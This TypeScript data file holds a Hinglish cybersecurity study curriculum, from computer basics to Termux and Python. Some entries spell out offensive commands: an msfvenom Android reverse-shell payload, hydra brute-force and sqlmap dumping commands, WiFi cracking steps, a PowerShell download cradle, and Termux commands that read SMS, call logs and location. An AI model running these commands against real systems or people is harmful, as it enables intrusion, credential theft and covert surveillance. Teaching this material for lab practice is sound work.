export interface Topic {
  id: string;
  phase: string;
  category: string;
  title: string;
  description: string;
  level: "beginner" | "intermediate" | "advanced";
  order: number;
}

export const curriculum: Topic[] = [

  // ═══════════════════════════════════════════════════════════
  // PHASE 1: COMPUTER BASICS
  // ═══════════════════════════════════════════════════════════
  { id: "cb-01", phase: "Phase 1: Computer Basics", category: "Hardware", title: "Computer Architecture & Components", level: "beginner", order: 1, description: "CPU, RAM, Motherboard, Storage (HDD/SSD/NVMe), GPU, PSU ka deep dive. Fetch-decode-execute cycle kya hai. Cache memory L1/L2/L3. 32-bit vs 64-bit architecture. BIOS aur UEFI ka role — computer on hone pe kya hota hai. Firmware attacks kyun dangerous hain. Cyber professional ke liye hardware knowledge attack surface samajhne ke liye zaroori hai. Von Neumann architecture aur modern computer design." },
  { id: "cb-02", phase: "Phase 1: Computer Basics", category: "Hardware", title: "Input/Output & Peripheral Security", level: "beginner", order: 2, description: "Input/Output devices aur unke security risks. USB Drop Attack — Rubber Ducky, O.MG cable, Bash Bunny kaise kaam karte hain. HID spoofing attacks. Physical security — Evil Maid Attack, Cold Boot Attack. Storage interfaces: SATA, NVMe. DMA attacks (Direct Memory Access). Keyboard side-channel attacks. Webcam/mic hijacking via malware. Physical access = full compromise kyun hota hai." },
  { id: "cb-03", phase: "Phase 1: Computer Basics", category: "Software", title: "Operating System Internals", level: "beginner", order: 3, description: "OS kernel, process scheduling, memory management. User space vs Kernel space — privilege rings (Ring 0-3). Windows Event Logs, Linux /var/log. Rootkits OS andar kaise chhupte hain. Process injection, DLL hijacking. Windows services aur daemons. System calls. Interrupt handling. Virtual memory aur paging. Context switching. OS hardening ke basic principles." },
  { id: "cb-04", phase: "Phase 1: Computer Basics", category: "Software", title: "File Systems, Permissions & Registry", level: "beginner", order: 4, description: "Windows NTFS (DACL, SACL, ADS — Alternate Data Streams). Linux permissions (rwx, chmod, chown, SUID/SGID/Sticky bit). /etc/passwd aur /etc/shadow — password hashes kahan hote hain. Windows Registry (HKLM, HKCU) — malware persistence yahan banata hai. File metadata aur timestamps (MACE). NTFS Alternate Data Streams se data hide karna. Forensics mein timestamps tamper detect karna." },
  { id: "cb-05", phase: "Phase 1: Computer Basics", category: "Binary & Data", title: "Binary, Hex & Number Systems", level: "beginner", order: 5, description: "Binary (base-2), Hex (base-16), Octal (base-8) conversion. Two's complement — negative numbers. Little-endian vs Big-endian — buffer overflow mein critical. XOR operation — encryption ka building block. Bitwise operations: AND, OR, XOR, NOT, shifts. x86 registers: EAX, EBX, ESP, EBP, EIP. Memory address representation. NOP instruction (0x90). Assembly language ka introduction. Why hackers need to understand binary." },
  { id: "cb-06", phase: "Phase 1: Computer Basics", category: "Binary & Data", title: "Encoding, Hashing & Cryptography Basics", level: "beginner", order: 6, description: "ASCII vs Unicode (UTF-8). Base64 encoding — malware isme data chhupata hai. URL encoding (%2F, %20). HTML entities. Hashing: MD5, SHA-1 (broken), SHA-256, SHA-3, bcrypt. Hash collision aur rainbow tables. CRC checksums. Entropy — encrypted data ki pehchaan. Steganography — files mein hidden data. Data vs metadata. Encoding vs Encryption fark samjhna." },
  { id: "cb-07", phase: "Phase 1: Computer Basics", category: "Virtualization", title: "Virtualization & Container Security", level: "intermediate", order: 7, description: "VM (VMware/VirtualBox) — Type 1 vs Type 2 hypervisor. Snapshots — malware testing ke liye. Docker containers — images, layers, volumes. Container vs VM security model differences. Container escape attacks — privileged containers, exposed Docker socket. Docker security best practices. Kubernetes basics. Lab isolation — alag network segment mein rakhna. VMs mein network modes: NAT, Bridged, Host-only. Side-channel attacks across VMs." },
  { id: "cb-08", phase: "Phase 1: Computer Basics", category: "Lab Setup", title: "Professional Hacking Lab Setup", level: "beginner", order: 8, description: "Kali Linux install (VM ya dedicated). Metasploitable 2/3 (vulnerable target). DVWA, VulnHub, HackTheBox, TryHackMe. Network isolation — lab traffic bahar na jaaye. Snapshots ka proper use. REMnux (malware analysis), FlareVM (Windows analysis). GNS3 network simulation. Android emulator mobile testing. Resource allocation tips. Burp Suite community vs pro. Essential tools list. Budget lab setup in India." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 2: NETWORKING MASTERY
  // ═══════════════════════════════════════════════════════════
  { id: "net-01", phase: "Phase 2: Computer Networking", category: "Fundamentals", title: "Network Fundamentals & Topologies", level: "beginner", order: 1, description: "LAN, WAN, MAN, PAN. Topologies: Star, Bus, Ring, Mesh. Devices: Hub vs Switch vs Router — security implications. MAC address aur spoofing. Broadcast vs collision domain. Ethernet frames. Network media: copper, fiber, wireless. Half vs full duplex. Bandwidth vs throughput vs latency. Network traffic capture kaise kaam karta hai. Promiscuous mode — packet sniffing enable karna. Layer 2 security issues." },
  { id: "net-02", phase: "Phase 2: Computer Networking", category: "Fundamentals", title: "IP Addressing & Subnetting", level: "beginner", order: 2, description: "IPv4 classes, private ranges (RFC 1918: 10.x, 172.16.x, 192.168.x). CIDR notation, subnet masks, VLSM. IPv6 — 128-bit, link-local vs global unicast. NAT aur PAT kaise kaam karte hain. IP spoofing. Subnetting calculations — /24, /16, /8. Supernetting. IANA aur regional registries. Bogon IPs. Loopback, APIPA addresses. IP geolocation. Traceroute — path analysis. Network reconnaissance ke liye IP ranges identify karna." },
  { id: "net-03", phase: "Phase 2: Computer Networking", category: "Protocols", title: "Ports, Protocols & Banner Grabbing", level: "beginner", order: 3, description: "Critical ports yaad karo: FTP-21, SSH-22, Telnet-23, SMTP-25, DNS-53, HTTP-80, SMB-445, RDP-3389, HTTPS-443. TCP three-way handshake (SYN/SYN-ACK/ACK). TCP flags aur unka misuse. UDP vs TCP tradeoffs. Banner grabbing — service aur version pata karna (netcat, Nmap). Common vulnerable services: Telnet (plaintext), FTP (anon login), SMB (EternalBlue). ICMP — ping, traceroute, types aur codes." },
  { id: "net-04", phase: "Phase 2: Computer Networking", category: "Protocols", title: "OSI Model — Layer-wise Attacks", level: "intermediate", order: 4, description: "OSI 7 layers — har layer ke specific attacks. Physical: cable tapping, RF jamming. Data Link: ARP Poisoning, MAC flooding, VLAN hopping (double tagging). Network: IP spoofing, ICMP attacks, route injection. Transport: SYN flood, TCP hijacking. Session: session fixation, replay attacks. Presentation: SSL stripping, malformed data. Application: XSS, SQLi, CSRF, XXE. PDU names — bit/frame/packet/segment/data. Defense strategies per layer." },
  { id: "net-05", phase: "Phase 2: Computer Networking", category: "Protocols", title: "DNS Deep Dive & Attacks", level: "intermediate", order: 5, description: "DNS resolution — recursive vs iterative. Record types: A, AAAA, MX, CNAME, TXT, NS, PTR. DNS cache poisoning (Kaminsky Attack). Zone transfer (AXFR) — information leakage. DNS tunneling — dnscat2, Iodine tools. Subdomain enumeration — subfinder, amass, dnsrecon. DNSSEC. DNS over HTTPS (DoH). Reverse DNS lookup. Internal vs external DNS. DNS amplification DDoS. DNS rebinding attacks. Passive DNS — historical records. Certificate transparency logs se subdomains." },
  { id: "net-06", phase: "Phase 2: Computer Networking", category: "Protocols", title: "HTTP/HTTPS — Security Deep Dive", level: "intermediate", order: 6, description: "HTTP methods, headers, status codes complete guide. Cookies: Secure, HttpOnly, SameSite flags. HSTS. TLS 1.2 vs TLS 1.3 — handshake process. Certificate chains aur CA. SSL stripping attack. HTTP request/response anatomy. Content-Type sniffing. Caching headers — cache poisoning. CORS headers aur misconfigurations. HTTP/2 aur HTTP/3 differences. WebSockets. HTTP request smuggling. Security headers: CSP, X-Frame-Options, HSTS, etc." },
  { id: "net-07", phase: "Phase 2: Computer Networking", category: "Tools", title: "Nmap — Complete Mastery", level: "intermediate", order: 7, description: "Nmap scan types: -sT, -sS (stealth SYN), -sU (UDP), -sA (ACK), -sN/F/X (NULL/FIN/XMAS). OS detection (-O), service version (-sV), aggressive (-A). NSE scripts — vuln, smb-vuln-*, http-enum, ftp-anon. Output: -oN, -oX, -oG, -oA. Timing templates (-T0 to -T5). Firewall evasion: -f (fragment), -D (decoy), --source-port, --data-length. Masscan — high-speed scanning. Combining nmap + NSE for full enumeration. Interpreting results. IDS/IPS evasion." },
  { id: "net-08", phase: "Phase 2: Computer Networking", category: "Tools", title: "Wireshark & Packet Analysis Mastery", level: "intermediate", order: 8, description: "Wireshark GUI aur tshark CLI. Capture vs display filters. Key filters: http, dns, tcp.port==22, ip.addr==x, !arp, frame contains 'password'. Follow TCP/HTTP streams. Extract files from pcap — HTTP objects. FTP/Telnet credentials capture. Identify port scans in traffic. Decrypting TLS with private key. Pcap analysis for CTF. Protocol statistics. IO graphs. Delta time analysis. C2 beaconing patterns identify karna. Network forensics workflow. Zeek/Bro introduction." },
  { id: "net-09", phase: "Phase 2: Computer Networking", category: "Attacks", title: "MITM & Network Attacks — Practical", level: "advanced", order: 9, description: "ARP Poisoning — arpspoof, ettercap, bettercap practical. MAC flooding — macof tool. DHCP starvation + rogue DHCP server. VLAN hopping — double tagging exploit. DNS spoofing through MITM. SSL stripping — sslstrip tool. Evil twin WiFi AP. SSLsplit, mitmproxy for HTTPS interception. Detecting MITM — arpwatch, static ARP. Network segmentation as defense. 802.1X port authentication. DNSSEC as DNS attack mitigation. Bettercap features — complete MITM framework." },
  { id: "net-10", phase: "Phase 2: Computer Networking", category: "Attacks", title: "DoS, DDoS & Amplification Attacks", level: "advanced", order: 10, description: "DoS vs DDoS architecture. Volume attacks: UDP flood, ICMP flood. Protocol attacks: SYN flood (hping3), Smurf, fragmentation. Application layer: Slowloris, RUDY, HTTP flood. Amplification: DNS (28x), NTP (556x), Memcached (51000x amplification!). Botnet mechanics — C2 communication. DDoS mitigation: rate limiting, scrubbing centers, CDN, anycast routing, BGP blackholing. LOIC/HOIC tools — why they're detectable. Layer 7 DDoS — hardest to mitigate. IP stressor/booter services." },
  { id: "net-11", phase: "Phase 2: Computer Networking", category: "Wireless", title: "WiFi Hacking — Aircrack-ng Suite", level: "advanced", order: 11, description: "WiFi standards aur security protocols: WEP (broken), WPA (broken), WPA2-Personal/Enterprise, WPA3. Monitor mode: airmon-ng. Capture: airodump-ng. Deauth attack: aireplay-ng -0. WPA2 4-way handshake capture. Cracking: aircrack-ng + rockyou.txt. PMKID attack — hcxdumptool + hashcat (no handshake needed). WPS Reaver/Bully attacks. Evil twin — hostapd-wpe. Karma attacks. Enterprise WPA attacks. WiFi security: disable WPS, WPA3, strong password, RADIUS server." },
  { id: "net-12", phase: "Phase 2: Computer Networking", category: "Anonymity", title: "Tor, Proxies & OPSEC", level: "advanced", order: 12, description: "Tor network — onion routing, entry/middle/exit nodes. .onion addresses. ProxyChains — chaining proxies (proxychains nmap). VPN + Tor combination aur risks. I2P network. SOCKS4/SOCKS5. Anonymity limitations — traffic correlation, exit node monitoring. Tails OS — amnesic, RAM-based. Whonix. OPSEC (Operational Security) — tools se zyada behavior matter karta hai. De-anonymization case studies. Digital footprints. Browser fingerprinting. OpSec failures — famous hacker arrests." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 3: OS & LINUX MASTERY
  // ═══════════════════════════════════════════════════════════
  { id: "os-01", phase: "Phase 3: Linux & Windows", category: "Linux Core", title: "Linux File System & Essential Commands", level: "beginner", order: 1, description: "Linux directory structure: /bin, /etc, /home, /var, /tmp, /proc, /sys, /dev, /opt. Important files: /etc/passwd, /etc/shadow, /etc/hosts, /etc/crontab. Navigation: ls -la, find, locate, which, whereis. Text processing: grep, awk, sed, cut, sort, uniq, wc. Pipes aur redirection. Wildcards aur brace expansion. /proc virtual filesystem. Hidden files. Soft vs hard links. Disk usage: df, du. Mount points. Log files locations." },
  { id: "os-02", phase: "Phase 3: Linux & Windows", category: "Linux Core", title: "Linux Commands — Hacker's Arsenal", level: "beginner", order: 2, description: "Networking: netstat, ss, ip, ifconfig, route. Process: ps aux, top, htop, kill, pkill. File analysis: strings, xxd, od, file, stat, exiftool. Comparison: diff, cmp. Archive: tar, gzip, zip. Download: wget, curl. Encoding: base64, openssl. Useful combos: grep -r 'password' /, find / -perm -4000 2>/dev/null, ps aux | grep -v grep. Netcat basics — connect, listen, file transfer. Crontab — scheduled tasks. Xargs. Tee. One-liner power combinations." },
  { id: "os-03", phase: "Phase 3: Linux & Windows", category: "Linux Core", title: "Linux Permissions, SUID & Capabilities", level: "intermediate", order: 3, description: "File permissions numeric (777, 644) aur symbolic (rwxr-xr-x). chmod, chown, chgrp. SUID (setuid) — runs as owner, privesc ke liye. SGID, Sticky bit. GTFOBins — SUID binaries se shell nikalna. Linux capabilities (CAP_NET_ADMIN, CAP_SYS_PTRACE). /etc/sudoers — NOPASSWD abuse. ACLs. AppArmor aur SELinux — mandatory access control. Privesc checklist: sudo -l, find SUID, cron, writable files. umask. World-writable directories (/tmp, /var/tmp)." },
  { id: "os-04", phase: "Phase 3: Linux & Windows", category: "Linux Core", title: "Processes, Services & Persistence", level: "intermediate", order: 4, description: "Process lifecycle — fork, exec, zombie. Signals: SIGTERM (15), SIGKILL (9), SIGHUP (1). Systemd — systemctl, journalctl. Screen/tmux — persistent sessions. Background processes: &, nohup, disown. LD_PRELOAD hijacking — shared library injection. Persistence mechanisms: cron jobs (/etc/cron.d/), systemd services (.service files), ~/.bashrc, authorized_keys, SUID backdoors. Detecting persistence — looking for anomalies. /proc/PID/ analysis. Shared libraries (ldd, LD_LIBRARY_PATH hijacking)." },
  { id: "os-05", phase: "Phase 3: Linux & Windows", category: "Linux Core", title: "Bash Scripting for Hackers", level: "intermediate", order: 5, description: "Variables, arrays, loops, conditions, functions. String manipulation aur regex. Netcat reverse shell one-liners. Bash port scanner. Password brute-forcer script. File crawler — sensitive data dhundna. Log analyzer. Automated recon script. Heredoc. Process substitution. Signal trapping. Script arguments. Error handling. Cron automation. Practical: automated nmap → nikto → gobuster pipeline. Interactive menus. Color output. Debug mode (set -x). Shellcheck — script validation." },
  { id: "os-06", phase: "Phase 3: Linux & Windows", category: "Linux Advanced", title: "Linux Networking & SSH Mastery", level: "intermediate", order: 6, description: "ip command complete guide. iptables/nftables — firewall rules banana. SSH key-based auth (ssh-keygen, ssh-copy-id). SSH config file tricks. SSH tunneling: Local port forwarding (-L), Remote (-R), Dynamic SOCKS (-D). ProxyJump. SCP, rsync, sftp. SSH as SOCKS proxy. Socat — advanced netcat. Tcpdump on CLI. SSH hardening: PermitRootLogin no, PasswordAuthentication no, AllowUsers, MaxAuthTries. SSH audit tools. Fail2ban integration. SSH known_hosts." },
  { id: "os-07", phase: "Phase 3: Linux & Windows", category: "Linux Advanced", title: "Linux System Hardening & Audit", level: "advanced", order: 7, description: "CIS Benchmarks for Linux. Disable unnecessary services (attack surface reduction). UFW/iptables firewall setup. Fail2ban configuration. PAM — password policies, pam_pwquality. Audit framework (auditd) — who accessed what, when. Lynis — automated security audit. AIDE/tripwire — file integrity monitoring. Rootkit detection — chkrootkit, rkhunter. Sysctl hardening — kernel parameters (ip_forward, rp_filter, etc). Kernel module signing. USB device control. Mandatory Access Control — AppArmor profiles." },
  { id: "os-08", phase: "Phase 3: Linux & Windows", category: "Windows", title: "Windows CLI, PowerShell & WMI", level: "intermediate", order: 8, description: "CMD: ipconfig, netstat, tasklist, net user, net group, whoami /all, dir /a, icacls, sc, reg. PowerShell basics — cmdlets, pipeline, objects. PS execution policy bypass. Download cradles — IEX(New-Object Net.WebClient). WMI (wmic) — recon aur persistence. Scheduled tasks (schtasks). Windows event logs (Get-WinEvent). Alternate Data Streams. LOLBins: certutil, regsvr32, mshta, rundll32, wscript, cscript. LOLBAS project. PowerShell history file — credentials leak." },
  { id: "os-09", phase: "Phase 3: Linux & Windows", category: "Windows", title: "Active Directory — Fundamentals & Attacks", level: "advanced", order: 9, description: "AD components: Domain, Forest, Tree, DC, OUs, GPOs. Kerberos authentication — TGT, TGS, AS-REQ, AS-REP. NTLM authentication. SPNs (Service Principal Names). BloodHound — attack path visualization. SharpHound collector. AD enumeration: PowerView, net commands, ldapsearch. Common misconfigurations: unconstrained delegation, AS-REP roasting targets, weak passwords, misconfigured ACLs. SYSVOL/GPP passwords. AdminSDHolder. Default domain admin tools — RSAT." },
  { id: "os-10", phase: "Phase 3: Linux & Windows", category: "Windows", title: "Windows Registry, Artifacts & Forensics", level: "advanced", order: 10, description: "Registry hives: HKLM (system), HKCU (user), HKCR, HKU. Persistence keys: Run, RunOnce, Services, AppInit_DLLs, Image File Execution Options. SAM database — local hashes. SYSTEM, SOFTWARE hives. Windows forensics artifacts: Prefetch, LNK files, ShellBags, Amcache, Shimcache, BAM/DAM, Jump Lists, UserAssist (program execution). $MFT (Master File Table). VSS (Volume Shadow Copies). Browser history, downloads. SRUM database. Recycle Bin. Timezone artifacts." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 3.5: TERMUX — ANDROID PE LINUX
  // ═══════════════════════════════════════════════════════════
  {
    id: "tmx-01", phase: "Phase 3.5: Termux (Android Linux)", category: "Setup & Basics", order: 1, level: "beginner",
    title: "Termux Installation & First Setup",
    description: "Termux kya hai aur kaise install karein. F-Droid se install karna zaroori hai (Play Store version outdated hai). proot, git, python, openssh install karna. Termux storage permission dena: 'termux-setup-storage'. Termux shortcuts (.shortcuts folder), extra keys row enable karna. Termux:API app — phone sensors access. Termux:Widget — home screen shortcuts. Font aur color scheme customize karna. ~/.bashrc ya ~/.zshrc mein aliases banana. oh-my-zsh install karna Termux mein. Basic orientation: HOME directory kahan hai, $PREFIX variable kya hai, /data/data/com.termux/ folder structure. Termux ek Linux environment hai Android pe — bina root ke bhi powerful hacking lab!",
  },
  {
    id: "tmx-02", phase: "Phase 3.5: Termux (Android Linux)", category: "Setup & Basics", order: 2, level: "beginner",
    title: "Termux Essential Commands — Complete Reference",
    description: "FILE MANAGEMENT: ls -la (sab files dekho), pwd (current location), cd ~ (home jao), mkdir -p folder/subfolder (nested folders), rm -rf folder (folder delete), cp source dest (copy), mv old new (rename/move), touch file.txt (empty file), cat file (content dekho), less file (scroll karo), head -20 file / tail -20 file (shuru ya end dekho). FILE EDITING: nano file.txt (easy editor), vi/vim file.txt (advanced). SEARCH: find / -name '*.txt' 2>/dev/null (file dhundo), grep -r 'password' . (text dhundo), grep -i 'error' logs.txt. PERMISSIONS: chmod +x script.sh (executable banao), chmod 755 file, ls -la (permissions dekho). PROCESSES: ps aux (running processes), kill -9 PID (process band karo), top / htop (live monitoring). OUTPUT: echo 'Hello' (text print), printf '%s\n' text (formatted), tee file.txt (screen + file dono). PIPING: command1 | command2, ls | grep .txt, cat file | sort | uniq. COMPRESSION: tar -czf archive.tar.gz folder/ (compress), tar -xzf archive.tar.gz (extract), zip -r file.zip folder/, unzip file.zip. DOWNLOAD: curl -O URL (file download), wget URL, curl -I URL (headers dekho).",
  },
  {
    id: "tmx-03", phase: "Phase 3.5: Termux (Android Linux)", category: "Setup & Basics", order: 3, level: "beginner",
    title: "pkg Package Manager — Termux Ka Apt",
    description: "pkg Termux ka package manager hai (apt ka wrapper). BASIC COMMANDS: pkg update && pkg upgrade (sab packages update karo — pehle yeh karo!), pkg install python (package install), pkg remove python (uninstall), pkg search nmap (package dhundo), pkg list-installed (installed packages dekho), pkg info python (package ka info). MUST-INSTALL PACKAGES: pkg install git python python2 nodejs ruby perl golang rust — programming languages. pkg install nmap netcat-openbsd openssh wget curl dnsutils whois — networking tools. pkg install vim nano emacs — text editors. pkg install tmux screen — terminal multiplexers. pkg install htop procps — system monitoring. pkg install tree fzf bat ripgrep — modern CLI tools. pkg install tsu (su wrapper — needs root). pkg install termux-api — phone APIs access. pkg install proot proot-distro — full Linux distros. pkg install metasploit (haan! Termux mein Metasploit chalta hai!). pkg install hydra sqlmap nikto — hacking tools. pkg install john hashcat — password cracking. pkg install aircrack-ng — WiFi testing (root needed for monitor mode). STORAGE: Packages $PREFIX (/data/data/com.termux/files/usr/) mein install hote hain. APT-GET bhi kaam karta hai Termux mein.",
  },
  {
    id: "tmx-04", phase: "Phase 3.5: Termux (Android Linux)", category: "Networking & Hacking", order: 4, level: "intermediate",
    title: "Termux Networking Commands — Complete Guide",
    description: "NETWORK INFO: ifconfig (ya ip addr) — interfaces dekho. Android mein wlan0 WiFi interface hai. ip route — routing table. netstat -tulpn (open ports), ss -tulpn. CONNECTIVITY: ping -c 4 google.com (network test), traceroute google.com, mtr google.com (real-time traceroute). DNS: nslookup example.com, dig example.com A (A record), dig example.com MX (mail server), dig +short example.com, host example.com, whois example.com. PORT SCANNING WITH NMAP: nmap -sV target.com (service version), nmap -A target (aggressive), nmap -sU -p 53,161 target (UDP scan), nmap -p- target (all ports), nmap --script vuln target (vulnerability scan), nmap -O target (OS detect). NETCAT: nc -lvp 4444 (listener start), nc target.com 80 (connect), nc -z target.com 1-1000 (port scan), echo 'GET / HTTP/1.0' | nc target.com 80 (HTTP request). HTTP REQUESTS: curl -X GET URL, curl -X POST -d 'data=value' URL, curl -H 'Authorization: Bearer token' URL, curl -b 'cookie=value' URL, curl -k URL (SSL ignore), curl -v URL (verbose — headers dekho), wget --mirror URL (website clone). SSH: ssh user@host, ssh -p 2222 user@host, ssh -L 8080:localhost:80 user@host (local tunnel), ssh -D 1080 user@host (SOCKS proxy). SCP: scp file.txt user@host:/path/, scp user@host:/path/file . PROXY: proxychains nmap -sT target.com.",
  },
  {
    id: "tmx-05", phase: "Phase 3.5: Termux (Android Linux)", category: "Networking & Hacking", order: 5, level: "intermediate",
    title: "Termux Hacking Tools — Setup & Commands",
    description: "METASPLOIT: pkg install metasploit. msfconsole start karo. search exploit_name, use exploit/path, show options, set RHOSTS target, set LHOST your_ip, run/exploit. msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o payload.apk (Android payload banana). SQLMAP: pkg install sqlmap. sqlmap -u 'http://site.com/page?id=1' --dbs (databases list), sqlmap -u URL -D dbname --tables, sqlmap -u URL --data='username=admin&password=test' --forms, sqlmap -u URL --cookie='PHPSESSID=xxx' --level=3. HYDRA: pkg install hydra. hydra -l admin -P rockyou.txt ssh://target (SSH brute), hydra -l admin -P passwords.txt http-post-form '/login:user=^USER^&pass=^PASS^:Invalid' target, hydra -L users.txt -P pass.txt ftp://target. NIKTO: nikto -h http://target.com (web vulnerability scan). JOHN THE RIPPER: pkg install john. john --wordlist=rockyou.txt hash.txt (crack hash), john --format=md5 hash.txt. HASHCAT (limited on Android): hashcat -m 0 hash.txt wordlist.txt. NCRACK: ncrack -v --user admin -P pass.txt ssh://target. AIRCRACK-NG: pkg install aircrack-ng. Needs monitor mode — root required on Android. airmon-ng start wlan0, airodump-ng wlan0mon, aircrack-ng -w wordlist capture.cap. BEEF (Browser Exploitation): git clone https://github.com/beefproject/beef, ruby install karke run karo.",
  },
  {
    id: "tmx-06", phase: "Phase 3.5: Termux (Android Linux)", category: "Scripting & Automation", order: 6, level: "intermediate",
    title: "Termux Scripting — Bash & Python Automation",
    description: "BASH SCRIPTING BASICS: #!/data/data/com.termux/files/usr/bin/bash (Termux mein shebang). Variables: name='Termux', echo $name. Input: read -p 'Enter target: ' target. Conditions: if [ -f file.txt ]; then echo 'exists'; fi. Loops: for i in {1..10}; do echo $i; done. While: while true; do date; sleep 1; done. Functions: scan() { nmap -sV $1; }. Error handling: set -e (exit on error), set -x (debug mode). EXAMPLE SCRIPTS: Port Scanner: for port in $(seq 1 1000); do (echo >/dev/tcp/target/$port) 2>/dev/null && echo 'Open: '$port; done. Subdomain Brute: while read sub; do host $sub.target.com; done < wordlist.txt. Auto Recon: #!/bin/bash; target=$1; nmap -sV $target > nmap.txt; nikto -h $target > nikto.txt; echo 'Done!'. PYTHON SCRIPTING: python3 script.py. pip install requests beautifulsoup4 scapy. Simple port scanner: import socket; s=socket.socket(); s.connect(('target', 80)); print('Open'). HTTP request: import requests; r=requests.get('http://target.com'); print(r.text). CRON JOB: crontab -e. */5 * * * * /path/script.sh (har 5 min). TERMUX NOTIFICATIONS: termux-notification --title 'Scan Done' --content 'Results ready'. VIBRATION: termux-vibrate -d 500. CLIPBOARD: echo 'text' | termux-clipboard-set. termux-clipboard-get.",
  },
  {
    id: "tmx-07", phase: "Phase 3.5: Termux (Android Linux)", category: "Advanced Termux", order: 7, level: "advanced",
    title: "Termux Advanced — proot-distro, SSH Server & Storage",
    description: "PROOT-DISTRO (Full Linux on Android): pkg install proot-distro. proot-distro list (available distros: ubuntu, debian, kali, alpine, archlinux). proot-distro install ubuntu (Ubuntu install karo). proot-distro login ubuntu (Ubuntu mein jao). proot-distro login kali-linux (Kali Linux!). Andar: apt update && apt upgrade, apt install metasploit-framework nmap burpsuite, python3 -m pip install toolname. proot-distro backup ubuntu (backup lena). GUI: pkg install x11-repo, pkg install xfce4 tigervnc (VNC server), vncserver start, phone mein VNC Viewer se connect karo — poori desktop! SSH SERVER SETUP: pkg install openssh. sshd (SSH server start karo). passwd (password set karo). Port: 8022 default. ssh user@phone_ip -p 8022 (laptop se phone mein SSH!). SSH KEYS: ssh-keygen -t rsa (keys generate). ~/.ssh/authorized_keys (allow laptop key). TERMUX STORAGE ACCESS: termux-setup-storage (permission lena). ~/storage/downloads (Downloads folder). ~/storage/dcim (Camera/Photos). ~/storage/shared (Internal storage). cp ~/storage/downloads/file.txt ~ (Termux mein copy). TERMUX API ADVANCED: termux-location (GPS coordinates). termux-camera-photo photo.jpg (photo lo). termux-microphone-record -l 10 -o audio.mp3 (audio record). termux-sms-list (SMS read — permission needed). termux-call-log (call history). termux-battery-status (battery info). termux-wifi-scaninfo (WiFi networks). TMUX: pkg install tmux. tmux new -s session (session banana), Ctrl+B D (detach), tmux attach -t session (resume), tmux split-pane -h (vertical split), multiple panes mein alag kaam!",
  },

  // ═══════════════════════════════════════════════════════════
  // PHASE 4: PROGRAMMING FOR HACKERS
  // ═══════════════════════════════════════════════════════════
  { id: "prog-01", phase: "Phase 4: Coding Basics", category: "Python", title: "Python Introduction", level: "beginner", order: 1, description: "Python kyun cybersecurity ka #1 language hai. Installation, variables, data types (int, str, list, dict, bool). print(f'Hello {name}') — f-strings best way. Conditions (if/elif/else) aur loops (for, while). Functions define karna — def function_name():. Basic cybersecurity examples se practice karte hain. Python ekdum beginner-friendly hai aur zyadatar hacking tools isi mein likhe hote hain." },
  { id: "prog-02", phase: "Phase 4: Coding Basics", category: "Python", title: "Control Flow & Functions", level: "beginner", order: 2, description: "Python mein logic likhna — advanced control flow. match-case statement se multiple conditions cleanly handle karna. Data structures: Lists (ordered, mutable), Tuples (immutable), Sets (unique values), Dictionaries (key-value pairs). Advanced functions: *args aur **kwargs, lambda one-liners. Regular expressions (re module) — pattern matching. Practical: password strength analyzer banate hain." },
  { id: "prog-03", phase: "Phase 4: Coding Basics", category: "Python", title: "Lists, Dicts & File I/O", level: "beginner", order: 3, description: "Lists aur dictionaries deep dive — nested structures. File operations: with open() as f — safely read/write karna. CSV aur JSON files handle karna — csv.DictReader, json.loads()/json.dumps(). collections.Counter se most common items nikaalna. os.path.exists() se file check karna. Practical project: log file analyzer banate hain — real security use-case." },
  { id: "prog-04", phase: "Phase 4: Coding Basics", category: "Python", title: "Object-Oriented Python", level: "intermediate", order: 4, description: "Classes aur objects — Python OOP fundamentals. __init__ constructor, self reference. Inheritance — child class parent se features leti hai. Practical OOP tools banate hain (jaise port scanner class). Threading se parallel operations — fast scanning. Decorators aur context managers — function ko wrap karke extra functionality add karna." },
  { id: "prog-05", phase: "Phase 4: Coding Basics", category: "Python", title: "Python for Networking (socket, requests)", level: "intermediate", order: 5, description: "Socket programming — low-level TCP/UDP connections Python se banana. requests library se HTTP interactions — sessions, cookies maintain karna. BeautifulSoup se HTML parsing aur web scraping/recon. Scapy se custom packet crafting — ethical hacking use-cases. Yeh topic Python ko network-facing security tools banane layak banata hai." },
  { id: "prog-06", phase: "Phase 4: Coding Basics", category: "Python", title: "Scripting for Automation", level: "intermediate", order: 6, description: "Repetitive security tasks Python se automate karna. argparse se professional CLI tools banana. subprocess.run() se shell commands safely run karna (list format — injection safe). schedule library se cron ke bina scheduled tasks. shutil se file/folder operations. Automation principles: idempotent, logged, error-handled scripts — real security automation tools." },
  { id: "prog-07", phase: "Phase 4: Coding Basics", category: "Web Languages", title: "JavaScript Basics", level: "intermediate", order: 7, description: "JavaScript — web browser ki language, har website mein use hoti hai. Variables (let, const), arrow functions, array methods (filter, map, reduce, forEach). DOM manipulation — getElementById, querySelector se HTML modify karna. XSS attacks ka intro — malicious JS inject karke cookie steal, keylogging. Web application security samajhne ke liye JavaScript basics zaroori hain." },
  { id: "prog-08", phase: "Phase 4: Coding Basics", category: "Databases", title: "SQL Basics", level: "beginner", order: 8, description: "SQL — relational databases se baat karne ki language. Tables, columns, rows, primary/foreign keys. CRUD operations: CREATE, SELECT, UPDATE, DELETE. Advanced queries: WHERE, aggregate functions, GROUP BY, JOINs, subqueries. SQL injection ka intro — user input directly query mein dalna kitna dangerous hai. Full SQLi deep dive next topic (prog-09) mein hai." },
  { id: "prog-09", phase: "Phase 4: Coding Basics", category: "Databases", title: "SQL Injection Deep Dive", level: "advanced", order: 9, description: "SQL Injection — OWASP #1 vulnerability, attack aur defense dono master karo. Types: In-band (union, error-based), Blind (boolean, time-based), Out-of-band injection. SQLMap — automated SQLi testing tool (authorized targets only). Prevention: parameterized queries/prepared statements — always use. ORM use karna — built-in SQLi protection." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 5: WEB APPLICATION SECURITY
  // ═══════════════════════════════════════════════════════════
